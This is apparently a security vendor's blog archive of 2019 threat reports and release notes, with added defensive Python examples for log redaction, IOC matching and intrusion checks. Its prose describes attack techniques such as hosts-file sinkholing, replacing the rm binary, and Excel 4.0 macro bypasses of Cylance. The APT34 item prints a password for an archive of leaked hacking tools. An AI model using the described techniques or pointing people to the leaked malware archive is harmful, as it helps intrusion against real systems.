Threat Report

Thursday April 18, 2019

Release Notes

April 23, 2019

Misc charts and detail view updates
All orgs onboarding progress
Sensor Outage Email to include additional information
Export escalated alerts as json or csv
Sorting, filtering, and actions for pages
ConnectWise Billing integration
Sensors - endpoint isn’t returning data
Updating ConnectWise integration for large MSP (Perch SOC) takes too long
Intel recent indicators shows infinite spinner
Onboarding_complete_at gets set when onboarding has not been finished
Indicator backtesting is not returning results

Threat Report Thursday April 18th 2019

on April 18, 2019

We’ve got a quick update for you this week on some news that’s getting attention. APT34 leaks hack tools, Common VPN software has a critical vulnerability patched, and Microsoft underestimates the exploitability of a remote code execution vulnerability. Additionally, an information technology firm from India has been compromised and is being leveraged in attacks against their own customers. Let’s get going.

APT34 hacking tools leak

As reported by ZDNet, yesterday some of the tools used by the OilRig attack group were leaked by a group of Iranian hackers called “Lab Dookhtegan”. Lab Dookhtegan started leaking information about the operations of APT34 / OilRig, which is supposedly the Iranian Ministry of Intelligence. However, this could be false attribution as well. The tools include:

  • Glimpse (newer version of a PowerShell-based trojan that Palo Alto Networks names BondUpdater)
  • PoisonFrog (older version of BondUpdater)
  • HyperShell (web shell that Palo Alto Networks calls TwoFace)
  • HighShell (another Web shell)
  • Fox Panel (phishing kit)
  • Webmask (DNS tunneling, main tool behind DNSpionage)

The full leak and tools were published on Lab Dookhtegan Telegram Channel with 30 members and can be downloaded here. Please make sure you use proper security steps such as sandbox and isolated environments. Open these files at your own risk. You can check more write up details on this GitHub page.

The origin of the leaked files is unknown, and they were not inspected for 0-day traps.

Pass: vJrqJeJo2n005FF*

VPN applications insecurely storing session cookies

Virtual Private Networks (VPNs) are used to create a secure connection with another network over the internet. As disclosed in a recent CERT advisory, multiple Virtual Private Network (VPN) applications store the authentication and/or session cookies insecurely in memory and/or log files.

  • CWE-311: Missing Encryption of Sensitive Data

The following products and versions store the cookie insecurely in log files:

  • CVE-2019-1573: Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS
  • CVE-2019-11213: Pulse Desktop Client 9.0R2 and earlier and 5.3R6 and earlier; Pulse Connect Secure (for Network Connect customers) 9.0R2 and earlier, 8.3R6 and earlier, and 8.1R13 and earlier

The following products and versions store the cookie insecurely in memory:

  • CVE-2019-1573: Palo Alto Networks GlobalProtect Agent 4.1.0 for Windows and GlobalProtect Agent 4.1.10 and earlier for macOS
  • CVE-2019-11213: Pulse Desktop Client 9.0R2 and earlier and 5.3R6 and earlier; Pulse Connect Secure (for Network Connect customers) 9.0R2 and earlier, 8.3R6 and earlier, and 8.1R13 and earlier
  • Cisco AnyConnect 4.7.x and prior
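The log-file half of this advisory is a textbook CWE-311 / plaintext-logging defect: the client writes the session cookie into its own log. The following is an added example written for this post (it is not code from Palo Alto, Pulse, Cisco, or the CERT advisory) showing the weak logging pattern next to a corrected one that masks cookie and token values before the line is built. The header names and values are constructed placeholders.

```python
import re

# Header names whose values must never be written to a log file.
# Constructed list for this example; extend it for your own application.
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization", "x-auth-token"}

# Constructed request headers carrying a session cookie and a bearer token.
# The cookie name and values are placeholders, not a real product's format.
SAMPLE_HEADERS = {
    "Host": "vpn.example.test",
    "User-Agent": "ConstructedVPNClient/1.0",
    "Cookie": "session=CONSTRUCTED_SESSION_VALUE; lang=en",
    "Authorization": "Bearer CONSTRUCTED_TOKEN_VALUE",
}


def format_log_line_insecure(method, path, headers):
    """The weak pattern: every header, cookies and tokens included, is
    written verbatim, so the log file becomes a store of live credentials."""
    rendered = "; ".join(f"{name}={value}" for name, value in headers.items())
    return f"{method} {path} headers=[{rendered}]"


def redact_cookie(value):
    """Keep cookie names (useful when debugging) but mask every value."""
    parts = []
    for pair in value.split(";"):
        name, sep, _ = pair.strip().partition("=")
        if name:
            parts.append(f"{name}=<redacted>" if sep else name)
    return "; ".join(parts)


def format_log_line_safe(method, path, headers):
    """The corrected pattern: sensitive headers are masked before the
    line is built, so no secret ever reaches the log."""
    rendered = []
    for name, value in headers.items():
        lname = name.lower()
        if lname in ("cookie", "set-cookie"):
            value = redact_cookie(value)
        elif lname in SENSITIVE_HEADERS:
            value = "<redacted>"
        rendered.append(f"{name}={value}")
    return f"{method} {path} headers=[{'; '.join(rendered)}]"


def contains_secret(line, *secrets):
    """Does a finished log line still carry any of the given secrets?"""
    return any(secret in line for secret in secrets)


if __name__ == "__main__":
    print(format_log_line_insecure("GET", "/portal", SAMPLE_HEADERS))
    print(format_log_line_safe("GET", "/portal", SAMPLE_HEADERS))
```

Redacting at the point where the line is built (rather than scrubbing log files afterwards) is what removes the exposure; a post-hoc scrubber still leaves a window in which the cookie is on disk. The in-memory half of the advisory is not something application logging can fix: that needs the vendor's client to stop holding the cookie in cleartext, which is why the patched versions listed above matter.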

Microsoft underestimates exploitability of DHCP bug

Microsoft has given the DHCP bug a low criticality score. However, a researcher on a Russian forum has posted information showing how the vulnerability can be exploited for remote code execution on a DHCP client. A rogue DHCP server in your environment could exploit this to hack all of your machines. Microsoft has offered updated guidance on the vulnerability.

Wipro hacked and targeting their own customers

Brian Krebs reported that Indian information technology firm, Wipro, has likely been compromised and hackers are using their foothold to attack Wipro customers.

KrebsOnSecurity heard independently from two trusted sources that Wipro, India’s third-largest IT outsourcing company was dealing with a multi-month intrusion from an assumed state-sponsored attacker.

Both sources, who spoke on condition of anonymity, said Wipro’s systems were seen being used as jumping-off points for digital phishing expeditions targeting at least a dozen Wipro customer systems.

The security experts said Wipro’s customers traced malicious and suspicious network reconnaissance activity back to partner systems that were communicating directly with Wipro’s network.

One source familiar with the forensic investigation at a Wipro customer said it appears at least 11 other companies were attacked, as evidenced from file folders found on the intruders’ back-end infrastructure that were named after various Wipro clients. That source declined to name the other clients.

Release Notes

April 8, 2019

Filter links to a single customer on indicator details
Extended storage for logs
Include recent flow_id in api response
New on-boarding wizard
Cannot click link to sensor and bring up sensor page
500 Error on Basic Authentication
Weekly update email doesn’t get complete data
Issue with 2FA logins due to email confirmation cage router
Community Pages/ View All - Recent True and False Positives not working
Redirect user back to original page after login
Contacts text field is losing focus on autosave

Threat Report Thursday April 4th 2019

on April 4, 2019

This week Skylight Cyber bursts Kaspersky’s Shadowhammer bubble. Dive into some Apache and PHP 0-days. Also, both Cisco and Georgia Tech learn that there are no second chances in security.

BARIUM likely responsible for Shadowhammer

Kaspersky is slowly dripping out information on Shadowhammer, but the community is not waiting. Out of 57,000 observed infections, Kaspersky identified only 600 targets that Shadowhammer selected for second-stage infection. Shadowhammer identifies targets based on a unique identifier assigned to a network interface controller (NIC), called a media access control address (MAC address).

In possibly the least efficient method of sharing information, Kaspersky created an executable and a website for you to submit your MAC address and see if you were one of the 600 known to be sought out by Shadowhammer. This seems like sharing but is actually not sharing. By not giving out the list and making everyone check their site and run their executables, Kaspersky can gather additional data about who was targeted by seeing where positive matches are coming from, and pick up some secondary intel for the talks they are planning later.

A group called Skylight Cyber popped up and wasn’t having it. They extracted and published the MAC addresses from the executable to their recently registered site. Here they are on github. You can double check their work by using the Kaspersky site to look up a MAC address.

I ran the list of MACs through two different vendor lookup databases to see what vendors were associated with these MACs. Then I found out someone else already did this so I’m just going to include their work.

vendor lookup databases

There were interesting things to note from this data. A majority of the targeted MAC addresses are related to vendors from Taiwan that make up our technology supply chain, with the exceptions being Huawei, VMware, and Intel. With so few MAC addresses targeted, I assume that the threat actor used MAC addresses as a way to single out targets of interest they had identified in some other way. This may have been through some ASUS internal data.

A MAC address doesn’t typically leave your local network. So, it’s not something a remote attacker would know. This was not an elaborate drag net this was very focused.

If I were at some of these companies higher in prevalence, like AzureWave Technologies, Liteon Technology, or Hon Hai Precision, I would be taking a good look around. There is a chance that they are actively targeting your employees. They might be targeting the exact employees they need to install more undetected supply chain backdoors. Remember, we only got approximately 600 MAC addresses observed from 57,000 of a potential 1,000,000 infections. If that pattern held true, there could be 10,526.3 targeted MAC addresses.

AzureWave Technologies, Inc (Taiwan) – Manufactures and sells wireless connectivity and image processing solutions worldwide.

Lite-On (Taiwan) - Primarily manufactures consumer electronics, including LEDs, semiconductors, computer chassis, monitors, motherboards, DVD, and CD devices, and other electronic components.

Hon Hai Precision Ind. Co.,Ltd (Taiwan) – Trading as Foxconn Technology Group and better known as Foxconn, is a Taiwanese multinational electronics contract manufacturing company.

There is a good chance we already know who is responsible for Shadowhammer. Certain evidence collected draws a link to the ShadowPad incident from 2017. The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM. BARIUM is an APT actor known to be using the Winnti backdoor. Recently, ESET wrote about another supply chain attack in which BARIUM was also involved.

The following indicators were indicators of compromise related to Shadowhammer.

Domains and IPs:

  • asushotfix[.]com
  • 141.105.71[.]116

Some of the URLs used to distribute the compromised packages:

  • hxxp://liveupdate01.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/
  • hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/

Hashes:

  • aa15eb28292321b586c27d8401703494
  • bebb16193e4b80f4bc053e4fa818aa4e2832885392469cd5b8ace5cec7e4ca19
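The indicators above are defanged for safe publication, so they have to be refanged before they are of any use against logs. As an added example (my own code, not Kaspersky's or anyone else's tooling), here is the matching step run over a few constructed DNS and proxy log lines; the client addresses, hostnames and file name in the sample lines are made up.

```python
import re

# Indicators from the lists above, kept in their defanged form.
DEFANGED_IOCS = [
    "asushotfix[.]com",
    "141.105.71[.]116",
    "hxxps://liveupdate01s.asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/",
]

# Constructed DNS and proxy log lines; the clients, hosts and file name are
# placeholders, not observations from any real environment.
SAMPLE_LOGS = [
    "2019-03-26T06:01:02Z dns client=10.0.0.5 query=asushotfix.com type=A",
    "2019-03-26T06:01:03Z proxy client=10.0.0.5 dst=141.105.71.116:443 bytes=5120",
    "2019-03-26T06:02:00Z proxy client=10.0.0.7 url=https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/constructed.zip",
    "2019-03-26T06:03:00Z dns client=10.0.0.9 query=www.example.test type=A",
]


def refang(ioc):
    """Undo the usual defanging: [.] and (.) back to '.', hxxp back to http."""
    ioc = ioc.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", ioc, flags=re.IGNORECASE)


def match_iocs(log_lines, iocs):
    """Return (line_number, original_ioc) for every line that contains a
    refanged indicator; matching is a case-insensitive substring search."""
    needles = [(ioc, refang(ioc).lower()) for ioc in iocs]
    hits = []
    for number, line in enumerate(log_lines, start=1):
        lowered = line.lower()
        for original, needle in needles:
            if needle in lowered:
                hits.append((number, original))
    return hits


def clients_to_review(log_lines, iocs):
    """Distinct client addresses that appear on lines hitting an indicator."""
    hit_numbers = {n for n, _ in match_iocs(log_lines, iocs)}
    clients = set()
    for number, line in enumerate(log_lines, start=1):
        if number in hit_numbers:
            m = re.search(r"client=(\S+)", line)
            if m:
                clients.add(m.group(1))
    return sorted(clients)


if __name__ == "__main__":
    for number, ioc in match_iocs(SAMPLE_LOGS, DEFANGED_IOCS):
        print(f"line {number}: {ioc}")
    print("clients to review:", clients_to_review(SAMPLE_LOGS, DEFANGED_IOCS))
```

One caveat that the list itself makes obvious: the liveupdate URLs are ASUS's real update path, so a hit there only tells you a machine pulled an update from the official server, not that the update was the trojanised one. Treat those hits as a prompt to check the downloaded file against the hashes above, while the asushotfix[.]com and 141.105.71[.]116 hits stand on their own.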

Carpe Diem: The story of a PHP 0-day and an Apache privilege escalation

Apache has been vulnerable to a local root privilege escalation from October 2015 to April 2019 due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts. In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles. Carpe Diem.

This vulnerability affects mod_prefork, mod_worker and mod_event. Based on the researcher’s report, the success rate of the exploit is 100 percent if Apache has more than four workers. But if the exploit fails, it can be restarted the next day, as Apache is not interrupted. Apache’s error.log will nevertheless contain notifications about its workers segfaulting.

The researcher also disclosed a PHP use after free zero day in this report that he chained with the Apache vulnerability to get remote code execution. Based on his report PHP never responded to the vulnerability report. This isn’t the only Apache vulnerability to make some waves recently. Check out CVE-2019-0211 while you’re at it.
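The one thing a defender gets for free here is that last sentence: the workers segfault, and Apache logs it. As an added example (my own detection logic, not from the researcher's report or the Apache project), here is a small parser that pulls worker segfault notices out of error.log, clusters them by minute, and flags a cluster that lands in the same minute as a graceful restart, which is the pattern the write-up describes. The sample lines are constructed; their layout follows the Apache 2.4 error log format and its AH00052 (child exit signal) and AH00171 (graceful restart) message codes, but every timestamp and pid is made up.

```python
import re
from collections import defaultdict

# Constructed error.log lines in the Apache 2.4 layout. The 06:25 timing
# mirrors the daily logrotate-triggered graceful restart mentioned above.
SAMPLE_LOG = [
    "[Tue Apr 02 06:25:00.001000 2019] [mpm_prefork:notice] [pid 1200] AH00171: Graceful restart requested, doing restart",
    "[Tue Apr 02 06:25:01.318209 2019] [core:notice] [pid 1200] AH00052: child pid 1235 exit signal Segmentation fault (11)",
    "[Tue Apr 02 06:25:02.004511 2019] [core:notice] [pid 1200] AH00052: child pid 1236 exit signal Segmentation fault (11)",
    "[Tue Apr 02 06:25:02.104993 2019] [core:notice] [pid 1200] AH00052: child pid 1237 exit signal Segmentation fault (11)",
    "[Tue Apr 02 14:10:44.120000 2019] [core:notice] [pid 1200] AH00052: child pid 1301 exit signal Segmentation fault (11)",
]

SEGFAULT_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[core:notice\] \[pid \d+(?::tid \d+)?\] "
    r"AH00052: child pid (?P<child>\d+) exit signal Segmentation fault \(11\)"
)
RESTART_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[mpm_\w+:notice\] \[pid \d+\] AH00171: Graceful restart requested"
)


def minute_of(ts):
    """'Tue Apr 02 06:25:01.318209 2019' -> 'Tue Apr 02 06:25'."""
    return ts[:16]


def parse_segfaults(lines):
    """(timestamp, child pid) for every worker segfault notice."""
    return [(m["ts"], int(m["child"])) for m in map(SEGFAULT_RE.match, lines) if m]


def analyse(lines, threshold=2):
    """Group worker segfaults by minute and report clusters at or above
    `threshold`, noting whether a graceful restart was logged in that minute."""
    restart_minutes = set()
    crashes = defaultdict(list)
    for line in lines:
        r = RESTART_RE.match(line)
        if r:
            restart_minutes.add(minute_of(r["ts"]))
            continue
        s = SEGFAULT_RE.match(line)
        if s:
            crashes[minute_of(s["ts"])].append(int(s["child"]))
    alerts = []
    for minute, pids in sorted(crashes.items()):
        if len(pids) >= threshold:
            alerts.append({
                "minute": minute,
                "worker_pids": pids,
                "after_graceful_restart": minute in restart_minutes,
            })
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

A single worker segfault at a random time of day is ordinary noise; several in the minute after a graceful restart, on a host that has not been patched, is the thing to page on. The minute key is a plain string, so the sort is only meaningful within one day's log; split by file or parse the timestamp properly if you run this across rotated logs.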

Cisco fumbles RV320 critical code execution patch

RedTeam Pentesting has recently released information on three Cisco vulnerabilities in the Cisco RV320 web UI, which were previously patched by Cisco in firmware version It appears that the patch was insufficient to prevent exploitation. The Cisco RV320 web interface is still vulnerable to unauthenticated command injection, diagnostic retrieval, and configuration export. Based on the reporting timeline, Cisco had six months to fix these critical vulnerabilities, and their solution was to block requests with a curl user-agent. When the researchers reported that the fix was insufficient, Cisco requested more time; however, the researchers declined to extend the publishing date. As far as I am aware, there is no patch available for these vulnerabilities. You should limit access to the Cisco RV320 web interface until Cisco can get it patched up for good.

Threat Report Wednesday March 27th 2019

on March 27, 2019

Supply chain attacks have been a growing threat for years. For any growing business, a dependence upon partners allows for the business to focus on their core mission. In many cases, this can typically involve either making technology partnerships or adopting technology platforms through mergers and acquisitions. Any of these changes require analysis to determine what new risks may be incurred. This week we’re focusing on recent news related to supply chain attacks, and the risks of adopting new technology through adoption or acquisition.

Microsoft uncovers Huawei PCManager exploitation

Third-party kernel drivers are becoming a more appealing target for attackers and an important area of research for security analysts. A vulnerability in a signed third-party driver could have a serious impact: it can be abused by attackers to escalate privileges or bypass driver signature enforcement—without requiring discovery and use of a Windows 0-day.

Computer manufacturers usually ship devices with software for device management. This software contains components that run with ring-0 privileges in the kernel. With these components installed by default, each must be as secure as the kernel.

Microsoft recently traced some anomalous behavior to a device management driver, PCManager, developed by Huawei. They found a lapse in the design that led to a vulnerability allowing local privilege escalation. Huawei has come under major fire from critics as allegedly being an espionage arm of the Chinese government. Huawei has been pursuing plans to roll out a 5G network that the Five Eyes (FVEY) reportedly are working against, as it could impact their ability to collect signals intelligence.

Microsoft reported the vulnerability (CVE-2019-5241) to Huawei. On January 9, 2019, Huawei released a fix. Windows Defender will now detect successful privilege escalation exploiting the HwOs2Ec10x64.sys watchdog vulnerability as demonstrated in the screenshot on the Microsoft Vulnerability Research blog.

Privilege escalation

ASUS serves up Shadowhammer trojan to one million customers

Huawei wasn’t the only manufacturer catching press last week. Researchers discovered that a threat actor modified the ASUS Live Update Utility, which delivers BIOS, UEFI, and software updates to ASUS laptops and desktops, added a back door to the utility, and then distributed it to users through official channels.

The trojan utility was signed with a legitimate certificate and was hosted on the official ASUS server dedicated to updates, and that allowed it to stay undetected for a long time. The threat actor even made sure the file size of the malicious utility stayed the same as that of the original one. Just, wow. The level of access they had here is insane.

According to Kaspersky researchers, it was distributed to about one million people total. The cybercriminals behind it were not interested in all of them, however — they targeted only 600 specific MAC addresses, for which the hashes were hardcoded into different versions of the utility. My first thought was: Surely there are better ways to hack 600 specific machines than trying to scoop them into a net of a million. Interesting technique here.

There is obviously a lot more to this story. If you want to check if you’re the target of this mystery, Kaspersky released a MAC checking service rather than just giving us the 600 MAC addresses. I’m sure they’ll leak out at some point.

In addition to ASUS, the same techniques were used against software from three other vendors. Those vendors were not disclosed at this time. Update the ASUS Live Update Utility if you use it or just consider burning your ASUS.

Please allow me to put on my tin foil hat. With all these vulnerabilities baked in by manufacturers (and actively being used on a large scale by a sophisticated actor), it is almost like this is not a coincidence. It is almost like there is an objective to infiltrate organizations through their technology.

Razer denies vulnerability, declines fix

In similar news from a different source, a little bird tells me that Razer Laptops have a vulnerability affecting all current laptops where the SPI Flash is set to full read/write and the Intel CPU is left in Manufacturing Mode. This allows for attackers to safeguard rootkits with Intel Boot Guard, downgrade the BIOS to exploit older vulnerabilities such as Meltdown, and many other things. According to the report, “[Razer] have yet to look into getting a CVE assigned, saying it isn’t necessary.”

Bloomberg stands by story fingering the People’s Republic for infiltration

Based on all of this suspicious activity, is it really hard to imagine that Bloomberg got their recent story reporting right? They have never retracted this story. They stand by this story of Supermicro hardware supply chain being infiltrated to plant some rogue technology. According to their reports, “the attack by Chinese spies reached almost 30 U.S. companies, including Amazon and Apple, by compromising America’s technology supply chain, according to extensive interviews with government and corporate sources.”

Based on Bloomberg’s reports, it was Amazon that discovered the implant during acquisition due-diligence of startup Elemental Technologies to help with a little streaming video service you may have heard of, Amazon Prime Video.

Nested on Elemental Technologies’ servers’ motherboards, the testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design. According to Bloomberg, “Amazon reported the discovery to U.S. authorities, sending a shudder through the intelligence community. Elemental’s servers could be found in Department of Defense data centers, the CIA’s drone operations, and the onboard networks of Navy warships. And Elemental was just one of hundreds of Supermicro customers.”

This report by Bloomberg has been denied, but (tinfoil hat) that may be because this breach was too large and too impactful to be confirmed. If Bloomberg got it right, then the Five Eyes are right to be concerned about Chinese government efforts to use private Chinese companies as an espionage arm to implant backdoors to infiltrate organizations and governments on a global scale.

We have reported on the security risks of mergers and acquisitions in the past, like what happened to Marriott and Starwood, where data of 500 million customers was breached. Perchy recommends security monitoring before, during, and after M&A activity to protect against infiltration.

ConnectWise Launches New Security Assessment Tool for Managed Service Providers

Perchy on March 26, 2019

ConnectWise today announced the launch of ConnectWise Identify™ which allows managed service providers (MSPs) to easily assess their own and their customers’ current security posture against a wide variety of malicious cybersecurity threats. The result is an easy-to-understand, customized risk report with remediation options, all from a single pane of glass, that has implications for the entire business, not just the network.

View the rest of the article here.

Release Notes

March 25, 2019

Add sensor name to the Sensor Detail page
Org should persist on refresh
Improve Perchybana dashboard importing speed
Require users sign ToS
Confirm emails for new users
Sensor outage emails
Fix counting issue on new record creation
Suppression statistics always show 0%
2FA status shows as unknown
The remediation graph on the right isn’t displaying data
Sensor details does not load
IP Count for MSP isn’t showing when MSP is selected
Details page is too wide and scrolls on some screens
Inaccurate private IP counts
Use Indices Queries to select indexes, keeping URLs short

Threat Report Wednesday March 20th 2019

on March 20, 2019

Ever wonder what attackers do once they get code execution to your hosts? Easy, they roll out ransomware or crypto miners to maximum effect. This week we’re focusing on rats, ransoms, and miners.


Remote access trojans (RATs) on a corporate system may serve as a key pivot point to access information laterally within an enterprise network. By analyzing network metadata, Recorded Future analysts were able to identify RAT command-and-control (C2) servers, and more crucially, which corporate networks were communicating to those controllers.

Researchers from Recorded Future partnered with Shodan’s Malware Hunter project to identify active malware controllers for 14 malware families between December 2, 2018 and January 9, 2019. They focused their analysis on a subset of malware — Emotet, Xtreme RAT, and ZeroAccess — to profile RAT communications from third-party organizations to the controllers. You should check out the full analysis on their site.

Trojans and RATs pose significant threats to government and company networks around the world. For instance, the developers behind Emotet continue to innovate and develop modularized functionality to aid propagation and evade traditional network defenses, resulting in widespread infections which, according to a US-CERT alert issued in July 2018, have cost state, local, tribal, and territorial (SLTT) governments up to $1 million per incident to remediate.


Xtreme RAT CnC 

Emotet CnC 

Ransom demands for world’s largest aluminum manufacturer

Norwegian power and metals giant, Norsk Hydro, is battling an extensive ransomware outbreak on its computers. Norsk Hydro is one of the world’s biggest makers of aluminum with sites in 50 countries. On Tuesday it was stated that ransomware had infected its IT systems in the U.S. and Europe. This cyber-intrusion forced a shutdown of its global computer network to contain the spread. Workers have had to switch to manual operations at its plants or temporarily halt production entirely as a precaution.

Norsk Hydro did not say whether the cyber-plague is limited to office PCs or if embedded industrial control hardware was also infected by the malware. Presumably, the software nasty has encrypted documents and data, and is demanding a ransom be paid to restore the files. It sounds as though the infection, described as “severe” by CFO Ivan Eivind Kallevik, was kept within its office network.

“IT systems in most business areas are impacted and Hydro is switching to manual operations as far as possible,” Norsk Hydro said in a statement today. “Hydro is working to contain and neutralize the attack, but does not yet know the full extent of the situation.”

A company spokesperson told The Register that the infection is believed to have originated in America. Media reports have named LockerGoga as the ransomware culprit, though Norsk Hydro told us that this particular malware is just one of several possible suspects.

So far there is no indication that Norsk Hydro has any plans to pay the ransom, and there’s still no news on restoring the encrypted systems and how long it will impact day-to-day operations.

Norsk Hydro ASA confirmed that a ransomware attack was behind production outages across the aluminum producer’s operations in Europe and the United States.

The perpetrators are still unknown, but the work is similar to other recent breaches. The Norwegian company, one of the world’s biggest aluminum producers, called the situation “quite severe,” and said it was still working to contain the effects. It couldn’t immediately detail how much output had been impacted but said the so-called potlines, which process molten aluminum and need to be kept running 24 hours a day, had switched to manual mode.

This attack does share characteristics with other attacks that have been observed. It’s important to share intelligence so that fewer of us are impacted by new threats. Mining companies should consider joining information sharing and analysis groups like MM-ISAC so they can stay aware of threats targeting their sector.

CryptoSink asks, “How strong is your Kung-Fu?”

Researchers have discovered a new crypto-mining campaign targeting Elasticsearch instances which includes sinkholing capabilities to squash any competing miners.

The aptly named “CryptoSink” malware campaign exploits an Elasticsearch vulnerability from 2014 (CVE-2014-3120) to mine cryptocurrency in Windows and Linux environments, according to F5’s Andrey Shalnev and Maxim Zavodchik.

At the time of the research, just one of the three hard-coded C&C domains was operational, resolving to a server located in China.

However, most interesting was the way it finds and kills any competing crypto-mining malware on the same host.

Typically, attackers do this by scanning running processes to find known malware names, or else looking to see which processes are consuming the most CPU.

“In this case, the malware dropper introduces a more sophisticated tactic to paralyze competitors who survive the initial purge. We’ve called it ‘CryptoSink’ because it sinkholes the outgoing traffic that is normally directed at popular cryptocurrency pools and redirects it to localhost ( instead,” F5 explained.

“It achieves this by writing the target pools’ domains to the ‘/etc/hosts’ file. In doing so, the competitors’ miners are not able to connect to those cryptocurrency pools and fail to start the mining process, which frees up system resources on the infected machine.”

The malware has another trick up its sleeve, this time to achieve persistence. It renames the original rm binary relating to the Linux “remove” command, to “rmm” and replaces it with a malicious file named “rm”, downloaded from its C&C server.

“Now, each time the user executes the rm command, the forged rm file will randomly decide if it should additionally execute a malicious code, and only then will it call the real rm command (that is, execute the file now that’s now named rmm). The malicious code in the rm binary will check if the cronjob exists and if not, it will be added again,” F5 explained.

“The irony is that even if the infected server’s administrator were to detect the other malicious files and try to remove them, she would probably use the rm command which, in turn, would reinstall the malware.”
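Both of CryptoSink's tricks leave marks a defender can check for without touching the (possibly forged) rm command. As an added example (my own checks, not from F5's report), here is a hosts-file audit that lists names pinned to loopback other than the normal local aliases, and an integrity check for the rm-to-rmm rename. The hosts content and the "binaries" are constructed stand-ins; on a real host the expected hash comes from the package manager's own manifest (rpm -V coreutils, dpkg --verify coreutils), never from a value computed on the suspect box.

```python
import hashlib

# Constructed /etc/hosts content: the last two entries are what a sinkholing
# dropper would add; the pool names are placeholders, not real pools.
SAMPLE_HOSTS = """127.0.0.1   localhost
::1         localhost ip6-localhost ip6-loopback
10.0.0.12   build-server.internal   # comment kept out of parsing
127.0.0.1   pool.example-miner.test
127.0.0.1   stratum.example-pool.test
"""

# Names that legitimately resolve to loopback on most distributions.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def sinkholed_names(hosts_text):
    """Hostnames pinned to loopback that are not the usual local aliases."""
    found = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        addr, *names = line.split()
        if addr == "::1" or addr.startswith("127."):
            found.extend(n for n in names if n not in LOCAL_NAMES)
    return found


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for the files in a bin directory. The "good" rm hash
# plays the role of the package manager's manifest value.
GOOD_RM = b"\x7fELF constructed stand-in for the real rm binary"
EXPECTED_RM_SHA256 = sha256_hex(GOOD_RM)
CLEAN_BIN = {"rm": GOOD_RM, "ls": b"\x7fELF constructed ls"}
INFECTED_BIN = {
    "rm": b"\x7fELF constructed forged rm",   # the downloaded replacement
    "rmm": GOOD_RM,                            # the real rm, renamed
    "ls": b"\x7fELF constructed ls",
}


def check_rm(bin_files, expected_sha256):
    """Findings for the rename-and-replace trick: a stray 'rmm' next to 'rm',
    or an 'rm' whose content no longer matches the package manifest."""
    findings = []
    if "rmm" in bin_files:
        findings.append("unexpected 'rmm' beside 'rm': original binary may have been renamed")
    rm = bin_files.get("rm")
    if rm is None:
        findings.append("rm is missing")
    elif sha256_hex(rm) != expected_sha256:
        findings.append("rm content does not match the package manifest hash")
    return findings


if __name__ == "__main__":
    print("sinkholed:", sinkholed_names(SAMPLE_HOSTS))
    print("clean bin:", check_rm(CLEAN_BIN, EXPECTED_RM_SHA256))
    print("infected bin:", check_rm(INFECTED_BIN, EXPECTED_RM_SHA256))
```

The point F5 makes about the administrator reinstalling the malware by running rm is exactly why the integrity check should be done with a tool that was not on the box (a package manager run from rescue media, or a known-good binary copied in), and why a hosts file that suddenly sinkholes a list of public names is a stronger signal than high CPU alone.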

Threat Report Wednesday March 13th 2019

on March 13, 2019

This week we’re going to learn about some 0-day vulnerabilities that have been running wild. Then we’re going to close out with some techniques red teamers and threat actors are using to bypass controls, pop shells, escalate privilege, and own your systems.

Four horsemen of the exploit apocalypse ride wild

In February, researchers reported to Microsoft that attackers in the wild were using a 0-day exploit to escalate Windows privileges. Microsoft has just released a patch crediting Kaspersky Lab researchers, Vasiliy Berdnikov and Boris Larin, with the discovery of a vulnerability in win32k.sys, classified as CVE-2019-0797.

Like CVE-2018-8589, researchers believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to use 0-days, SandCat is a new APT discovered recently and was not previously known to use 0-days. In addition to CVE-2019-0797 and CHAINSHOT, SandCat also uses the FinFisher/FinSpy framework.

CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls. In addition to CVE-2018-8589, CVE-2018-9611, and CHAINKILL, CVE-2019-0797 is, according to Kaspersky researchers, the fourth horseman in a wild 0-day apocalypse.

The exploit was targeting 64-bit operating systems in the range from Windows 8 to Windows 10 build 15063. The exploitation process is performed using heap spraying with palettes and accelerator tables. In exploitation of Windows 10 build 14393 and higher, window objects are used instead of palettes. Besides that, the exploit checks whether it’s running from Google Chrome and stops execution if it is, because vulnerability CVE-2019-0797 can’t be exploited within a sandbox.

Sneaky sneaky bypasses

Last week we discussed some novel news in ransomware distribution, which included a technique for bypassing Windows security controls. Attackers haven’t stopped discovering new ways to distribute malware. Now they are compromising PirateBay accounts to seed malicious files using trustworthy-looking accounts. Let’s check out some more sneaky techniques (proof of concept included) that attackers use to land and stick their infections on Windows 10 with VBA macros and dialog box spoofing, even when Cylance is present.

MDSec silences Cylance

At AppSecEU 2014 in Cambridge, I had the opportunity to take a mobile application hacking course with MDSec CEO and Mobile Application Hacker’s Handbook author Dominic Chell. I am as impressed by the folks at MDSec today as I was then. In a recent publication, his team describes bypassing some of the most common CylancePROTECT controls. For defenders using Cylance, this provides insight into where gaps in your security controls might exist and how to effectively layer complementary solutions to reduce risk.

Some of these gaps are straightforward. For instance, CylancePROTECT has no restrictions on Excel 4.0 macro-enabled documents, even when they are explicitly blocked by policy. This provides an effective means for obtaining initial access in a Cylance environment. Old school evil Excel 4.0 macros have been covered in detail by Stan Hegt.

